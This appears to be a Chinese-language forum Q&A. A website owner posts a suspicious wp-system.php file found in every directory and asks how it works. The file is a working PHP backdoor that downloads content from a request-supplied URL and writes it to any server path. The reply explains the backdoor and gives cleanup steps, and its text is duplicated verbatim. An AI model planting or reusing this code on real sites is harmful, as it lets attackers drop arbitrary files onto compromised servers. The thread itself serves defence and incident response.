我在我的网站上发现了奇怪的wp-system.php文件

我在所有目录中看到了一堆名为wp-system.php、chmod 444的文件，其中包含以下代码：

<?php 
function class_x_i($x=''){
    $urlset = isset($_REQUEST['name']) ? trim($_REQUEST['name']) : '';
    $filename = isset($_REQUEST['file']) ? trim($_REQUEST['file']) : '';
    $ch = curl_init('http://'.$urlset);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $result = curl_exec($ch);
    if ($filename!='') {
    file_put_contents($filename, $result);
    }
    if (isset($_GET['up2018info'])) {
        echo '01024k';
    }
}
class_x_i();

?>

---

我从未见过这样的文件上传器。有人能解释一下它是如何工作的吗？

似乎它会将一些东西下载到您的服务器上。您的站点可能感染了恶意软件，请阅读此处：。您所说的“如何工作”是什么意思？你不清楚这段代码的哪些部分？它不是上传程序，而是下载程序。它能够从传入请求中提供的URL下载内容，然后将其保存在服务器上的文件中。因此，基本上，它是一个后门，用于将其他文件（例如，其他恶意软件脚本！）保存到您的网站上。它几乎可以下载任何东西。它是如何到达那里的是一个谜，但如果您的服务器上没有足够严格的文件权限，那么此文件可能会以这种方式到达那里，并且权限不严格也会使脚本更容易下载并将更多内容保存到您的服务器上。您需要删除此文件的所有副本，在站点文件夹上设置更安全的文件权限，并更改与站点相关的所有密码（例如登录、FTP帐户、数据库帐户等）。然后检查您不知道该脚本可能正在下载的其他内容。1。删除所有内容，最好将服务器扔进垃圾箱。2.从干净的备份中恢复。3.更新、修补、强化安全性等，似乎会将某些内容下载到您的服务器上。您的站点可能感染了恶意软件，请阅读此处：。您所说的“如何工作”是什么意思？你不清楚这段代码的哪些部分？它不是上传程序，而是下载程序。它能够从传入请求中提供的URL下载内容，然后将其保存在服务器上的文件中。因此，基本上，它是一个后门，用于将其他文件（例如，其他恶意软件脚本！）保存到您的网站上。它几乎可以下载任何东西。它是如何到达那里的是一个谜，但如果您的服务器上没有足够严格的文件权限，那么此文件可能会以这种方式到达那里，并且权限不严格也会使脚本更容易下载并将更多内容保存到您的服务器上。您需要删除此文件的所有副本，在站点文件夹上设置更安全的文件权限，并更改与站点相关的所有密码（例如登录、FTP帐户、数据库帐户等）。然后检查您不知道该脚本可能正在下载的其他内容。1。删除所有内容，最好将服务器扔进垃圾箱。2.从干净的备份中恢复。3.更新、修补、强化安全性等。